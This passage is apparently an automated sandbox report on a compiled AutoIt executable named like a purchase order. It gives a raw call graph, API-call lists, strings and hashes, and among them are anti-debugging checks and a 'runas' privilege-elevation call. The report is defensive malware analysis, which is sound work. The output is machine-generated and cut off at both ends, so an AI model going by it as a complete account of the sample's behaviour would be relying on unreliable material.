85210 414910 _fseek 85207->85210 85208 414923 85263 417f77 46 API calls __getptd_noexit 85208->85263 85210->85208 85212 414951 85210->85212 85211 414928 85264 417f25 10 API calls _fseek 85211->85264 85226 41d4d1 85212->85226 85215 414956 85216 41496a 85215->85216 85217 41495d 85215->85217 85219 414992 85216->85219 85220 414972 85216->85220 85265 417f77 46 API calls __getptd_noexit 85217->85265 85243 41d218 85219->85243 85266 417f77 46 API calls __getptd_noexit 85220->85266 85221 414933 _fseek @_EH4_CallFilterFunc@8 85221->85153 85227 41d4dd _fseek 85226->85227 85228 4182cb __lock 46 API calls 85227->85228 85240 41d4eb 85228->85240 85229 41d560 85268 
41d5fb 85229->85268 85230 41d567 85232 416b04 __malloc_crt 46 API calls 85230->85232 85234 41d56e 85232->85234 85233 41d5f0 _fseek 85233->85215 85234->85229 85235 41d57c InitializeCriticalSectionAndSpinCount 85234->85235 85237 41d59c 85235->85237 85238 41d5af EnterCriticalSection 85235->85238 85241 413748 _free 46 API calls 85237->85241 85238->85229 85239 418209 __mtinitlocknum 46 API calls 85239->85240 85240->85229 85240->85230 85240->85239 85271 4154b2 47 API calls __lock 85240->85271 85272 415520 LeaveCriticalSection LeaveCriticalSection _doexit 85240->85272 85241->85229 85244 41d23a 85243->85244 85245 41d255 85244->85245 85254 41d26c __wopenfile 85244->85254 85277 417f77 46 API calls __getptd_noexit 85245->85277 85247 41d25a 85278 417f25 10 API calls _fseek 85247->85278 85249 41d47a 85282 417f77 46 API calls __getptd_noexit 85249->85282 85250 41d48c 85274 422bf9 85250->85274 85253 41499d 85267 4149b8 LeaveCriticalSection LeaveCriticalSection __wfsopen 85253->85267 85254->85249 85262 41d421 85254->85262 85279 41341f 58 API calls 2 library calls 85254->85279 85255 41d47f 85283 417f25 10 API calls _fseek 85255->85283 85258 41d41a 85258->85262 85280 41341f 58 API calls 2 library calls 85258->85280 85260 41d439 85260->85262 85281 41341f 58 API calls 2 library calls 85260->85281 85262->85249 85262->85250 85263->85211 85264->85221 85265->85221 85266->85221 85267->85221 85273 4181f2 LeaveCriticalSection 85268->85273 85270 41d602 85270->85233 85271->85240 85272->85240 85273->85270 85284 422b35 85274->85284 85276 422c14 85276->85253 85277->85247 85278->85253 85279->85258 85280->85260 85281->85262 85282->85255 85283->85253 85285 422b41 _fseek 85284->85285 85286 422b54 85285->85286 85288 422b8a 85285->85288 85287 417f77 _fseek 46 API calls 85286->85287 85289 422b59 85287->85289 85290 422400 __tsopen_nolock 109 API calls 85288->85290 85291 417f25 _fseek 10 API calls 85289->85291 85292 422ba4 85290->85292 85294 422b63 _fseek 85291->85294 85293 422bcb __wsopen_helper 
LeaveCriticalSection 85292->85293 85293->85294 85294->85276 85298 4150dd _fseek 85295->85298 85296 4150e9 85326 417f77 46 API calls __getptd_noexit 85296->85326 85298->85296 85299 41510f 85298->85299 85308 415471 85299->85308 85300 4150ee 85327 417f25 10 API calls _fseek 85300->85327 85307 4150f9 _fseek 85307->85158 85309 415483 85308->85309 85310 4154a5 EnterCriticalSection 85308->85310 85309->85310 85311 41548b 85309->85311 85312 415117 85310->85312 85313 4182cb __lock 46 API calls 85311->85313 85314 415047 85312->85314 85313->85312 85315 415067 85314->85315 85316 415057 85314->85316 85318 415079 85315->85318 85329 414e4e 85315->85329 85384 417f77 46 API calls __getptd_noexit 85316->85384 85346 41443c 85318->85346 85323 4150b9 85359 41e1f4 85323->85359 85325 41505c 85328 415143 LeaveCriticalSection LeaveCriticalSection __wfsopen 85325->85328 85326->85300 85327->85307 85328->85307 85330 414e61 85329->85330 85331 414e79 85329->85331 85385 417f77 46 API calls __getptd_noexit 85330->85385 85332 414139 __fputwc_nolock 46 API calls 85331->85332 85334 414e80 85332->85334 85337 41e1f4 __write 51 API calls 85334->85337 85335 414e66 85386 417f25 10 API calls _fseek 85335->85386 85338 414e97 85337->85338 85339 414f09 85338->85339 85341 414ec9 85338->85341 85345 414e71 85338->85345 85387 417f77 46 API calls __getptd_noexit 85339->85387 85342 41e1f4 __write 51 API calls 85341->85342 85341->85345 85343 414f64 85342->85343 85344 41e1f4 __write 51 API calls 85343->85344 85343->85345 85344->85345 85345->85318 85347 414455 85346->85347 85351 414477 85346->85351 85348 414139 __fputwc_nolock 46 API calls 85347->85348 85347->85351 85349 414470 85348->85349 85388 41b7b2 77 API calls 5 library calls 85349->85388 85352 414139 85351->85352 85353 414145 85352->85353 85354 41415a 85352->85354 85389 417f77 46 API calls __getptd_noexit 85353->85389 85354->85323 85356 41414a 85390 417f25 10 API calls _fseek 85356->85390 85358 414155 85358->85323 85360 41e200 _fseek 85359->85360 85361 41e223 
85360->85361 85362 41e208 85360->85362 85364 41e22f 85361->85364 85368 41e269 85361->85368 85411 417f8a 46 API calls __getptd_noexit 85362->85411 85413 417f8a 46 API calls __getptd_noexit 85364->85413 85366 41e20d 85412 417f77 46 API calls __getptd_noexit 85366->85412 85367 41e234 85414 417f77 46 API calls __getptd_noexit 85367->85414 85391 41ae56 85368->85391 85372 41e23c 85415 417f25 10 API calls _fseek 85372->85415 85373 41e26f 85375 41e291 85373->85375 85376 41e27d 85373->85376 85416 417f77 46 API calls __getptd_noexit 85375->85416 85401 41e17f 85376->85401 85377 41e215 _fseek 85377->85325 85380 41e289 85418 41e2c0 LeaveCriticalSection __unlock_fhandle 85380->85418 85381 41e296 85417 417f8a 46 API calls __getptd_noexit 85381->85417 85384->85325 85385->85335 85386->85345 85387->85345 85388->85351 85389->85356 85390->85358 85392 41ae62 _fseek 85391->85392 85393 41aebc 85392->85393 85394 4182cb __lock 46 API calls 85392->85394 85395 41aec1 EnterCriticalSection 85393->85395 85396 41aede _fseek 85393->85396 85397 41ae8e 85394->85397 85395->85396 85396->85373 85398 41aeaa 85397->85398 85399 41ae97 InitializeCriticalSectionAndSpinCount 85397->85399 85400 41aeec ___lock_fhandle LeaveCriticalSection 85398->85400 85399->85398 85400->85393 85402 41aded __commit 46 API calls 85401->85402 85403 41e18e 85402->85403 85404 41e1a4 SetFilePointer 85403->85404 85405 41e194 85403->85405 85406 41e1bb GetLastError 85404->85406 85408 41e1c3 85404->85408 85407 417f77 _fseek 46 API calls 85405->85407 85406->85408 85409 41e199 85407->85409 85408->85409 85410 417f9d __dosmaperr 46 API calls 85408->85410 85409->85380 85410->85409 85411->85366 85412->85377 85413->85367 85414->85372 85415->85377 85416->85381 85417->85380 85418->85377 85420 4149ea 85419->85420 85421 4149fe 85419->85421 85465 417f77 46 API calls __getptd_noexit 85420->85465 85422 4149fa 85421->85422 85424 41443c __flush 77 API calls 85421->85424 85437 414ab2 LeaveCriticalSection LeaveCriticalSection __wfsopen 85422->85437 
85426 414a0a 85424->85426 85425 4149ef 85466 417f25 10 API calls _fseek 85425->85466 85438 41d8c2 85426->85438 85430 414139 __fputwc_nolock 46 API calls 85431 414a18 85430->85431 85442 41d7fe 85431->85442 85433 414a1e 85433->85422 85434 413748 _free 46 API calls 85433->85434 85434->85422 85435->85168 85436->85173 85437->85173 85439 414a12 85438->85439 85440 41d8d2 85438->85440 85439->85430 85440->85439 85441 413748 _free 46 API calls 85440->85441 85441->85439 85443 41d80a _fseek 85442->85443 85444 41d812 85443->85444 85445 41d82d 85443->85445 85482 417f8a 46 API calls __getptd_noexit 85444->85482 85446 41d839 85445->85446 85452 41d873 85445->85452 85484 417f8a 46 API calls __getptd_noexit 85446->85484 85448 41d817 85483 417f77 46 API calls __getptd_noexit 85448->85483 85451 41d83e 85485 417f77 46 API calls __getptd_noexit 85451->85485 85454 41ae56 ___lock_fhandle 48 API calls 85452->85454 85455 41d879 85454->85455 85457 41d893 85455->85457 85458 41d887 85455->85458 85456 41d846 85486 417f25 10 API calls _fseek 85456->85486 85487 417f77 46 API calls __getptd_noexit 85457->85487 85467 41d762 85458->85467 85462 41d81f _fseek 85462->85433 85463 41d88d 85488 41d8ba LeaveCriticalSection __unlock_fhandle 85463->85488 85465->85425 85466->85422 85489 41aded 85467->85489 85469 41d7c8 85502 41ad67 47 API calls 2 library calls 85469->85502 85470 41d772 85470->85469 85471 41d7a6 85470->85471 85473 41aded __commit 46 API calls 85470->85473 85471->85469 85474 41aded __commit 46 API calls 85471->85474 85476 41d79d 85473->85476 85477 41d7b2 CloseHandle 85474->85477 85475 41d7d0 85478 41d7f2 85475->85478 85503 417f9d 46 API calls 3 library calls 85475->85503 85480 41aded __commit 46 API calls 85476->85480 85477->85469 85481 41d7be GetLastError 85477->85481 85478->85463 85480->85471 85481->85469 85482->85448 85483->85462 85484->85451 85485->85456 85486->85462 85487->85463 85488->85462 85490 41adfa 85489->85490 85491 41ae12 85489->85491 85492 417f8a __read 46 API calls 85490->85492 

                      Control-flow Graph

                      APIs
                      • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                        • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                        • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                        • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                        • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                        • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                        • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                      • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                      • GetFullPathNameW.KERNEL32(004A7F6C,00000104,?,004A7F50,004A7F54), ref: 0040D625
                        • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                      • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                      • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                      • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                      • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                        • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                        • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                        • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                        • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                        • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                        • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                        • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                        • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                        • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                        • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                        • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                        • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                      Strings
                      • runas, xrefs: 0042E2AD, 0042E2DC
                      • This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support., xrefs: 0042E1C2
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                      • String ID: This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                      • API String ID: 2495805114-3383388033
                      • Opcode ID: e8c9047fb359c29ec9f900fe27c3aa55fa0c8583f95d62b388df9f145cb8bf6e
                      • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                      • Opcode Fuzzy Hash: e8c9047fb359c29ec9f900fe27c3aa55fa0c8583f95d62b388df9f145cb8bf6e
                      • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1004 40e500-40e57c call 40bc70 GetVersionExW call 402160 call 40e660 call 40e680 1013 40e582-40e583 1004->1013 1014 427674-427679 1004->1014 1017 40e585-40e596 1013->1017 1018 40e5ba-40e5cb call 40ef60 1013->1018 1015 427683-427686 1014->1015 1016 42767b-427681 1014->1016 1019 427693-427696 1015->1019 1020 427688-427691 1015->1020 1024 4276b4-4276be 1016->1024 1021 427625-427629 1017->1021 1022 40e59c-40e59f 1017->1022 1035 40e5ec-40e60c 1018->1035 1036 40e5cd-40e5e6 GetCurrentProcess call 40ef20 1018->1036 1019->1024 1027 427698-4276a8 1019->1027 1020->1024 1029 427636-427640 1021->1029 1030 42762b-427631 1021->1030 1025 40e5a5-40e5ae 1022->1025 1026 427654-427657 1022->1026 1037 4276c6-4276ca GetSystemInfo 1024->1037 1031 40e5b4 1025->1031 1032 427645-42764f 1025->1032 1026->1018 1038 42765d-42766f 1026->1038 1033 4276b0 1027->1033 1034 4276aa-4276ae 1027->1034 1029->1018 1030->1018 1031->1018 1032->1018 1033->1024 1034->1024 1040 40e612-40e623 call 40efd0 1035->1040 1041 4276d5-4276df GetSystemInfo 1035->1041 1036->1035 1048 40e5e8 1036->1048 1037->1041 1038->1018 1040->1037 1045 40e629-40e63f call 40ef90 GetNativeSystemInfo 1040->1045 1050 40e641-40e642 FreeLibrary 1045->1050 1051 40e644-40e651 1045->1051 1048->1035 1050->1051 1052 40e653-40e654 FreeLibrary 1051->1052 1053 40e656-40e65d 1051->1053 1052->1053
                      APIs
                      • GetVersionExW.KERNEL32(?), ref: 0040E52A
                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                      • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                      • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                      • FreeLibrary.KERNEL32(?), ref: 0040E642
                      • FreeLibrary.KERNEL32(?), ref: 0040E654
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                      • String ID: 0SH
                      • API String ID: 3363477735-851180471
                      • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                      • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                      • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                      • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                      APIs
                      • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                      • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: AddressLibraryLoadProc
                      • String ID: IsThemeActive$uxtheme.dll
                      • API String ID: 2574300362-3542929980
                      • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                      • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                      • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                      • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                      APIs
                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                      • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                      • TranslateMessage.USER32(?), ref: 00409556
                      • DispatchMessageW.USER32(?), ref: 00409561
                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Message$Peek$DispatchSleepTranslate
                      • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                      • API String ID: 1762048999-758534266
                      • Opcode ID: 65ef02fb38a27282c9e7cf101ebea7aa72ed4640524a943440740a68ee139f81
                      • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                      • Opcode Fuzzy Hash: 65ef02fb38a27282c9e7cf101ebea7aa72ed4640524a943440740a68ee139f81
                      • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A

                      Control-flow Graph

                      APIs
                      • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                      • __wcsicoll.LIBCMT ref: 00402007
                      • __wcsicoll.LIBCMT ref: 0040201D
                      • __wcsicoll.LIBCMT ref: 00402033
                        • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                      • __wcsicoll.LIBCMT ref: 00402049
                      • _wcscpy.LIBCMT ref: 0040207C
                      • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104), ref: 00428B5B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                      • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$CMDLINE$CMDLINERAW
                      • API String ID: 3948761352-1609664196
                      • Opcode ID: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                      • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                      • Opcode Fuzzy Hash: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                      • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99

                      Control-flow Graph

                      APIs
                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                      • __wsplitpath.LIBCMT ref: 0040E41C
                        • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                      • _wcsncat.LIBCMT ref: 0040E433
                      • __wmakepath.LIBCMT ref: 0040E44F
                        • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                        • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                      • _wcscpy.LIBCMT ref: 0040E487
                        • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                      • _wcscat.LIBCMT ref: 00427541
                      • _wcslen.LIBCMT ref: 00427551
                      • _wcslen.LIBCMT ref: 00427562
                      • _wcscat.LIBCMT ref: 0042757C
                      • _wcsncpy.LIBCMT ref: 004275BC
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                      • String ID: Include$\
                      • API String ID: 3173733714-3429789819
                      • Opcode ID: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                      • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                      • Opcode Fuzzy Hash: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                      • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E

                      Control-flow Graph

                      APIs
                      • _fseek.LIBCMT ref: 0045292B
                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                        • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                        • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                      • __fread_nolock.LIBCMT ref: 00452961
                      • __fread_nolock.LIBCMT ref: 00452971
                      • __fread_nolock.LIBCMT ref: 0045298A
                      • __fread_nolock.LIBCMT ref: 004529A5
                      • _fseek.LIBCMT ref: 004529BF
                      • _malloc.LIBCMT ref: 004529CA
                      • _malloc.LIBCMT ref: 004529D6
                      • __fread_nolock.LIBCMT ref: 004529E7
                      • _free.LIBCMT ref: 00452A17
                      • _free.LIBCMT ref: 00452A20
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                      • String ID:
                      • API String ID: 1255752989-0
                      • Opcode ID: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                      • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                      • Opcode Fuzzy Hash: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                      • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59

                      Control-flow Graph

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: __fread_nolock$_fseek_wcscpy
                      • String ID: FILE
                      • API String ID: 3888824918-3121273764
                      • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                      • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
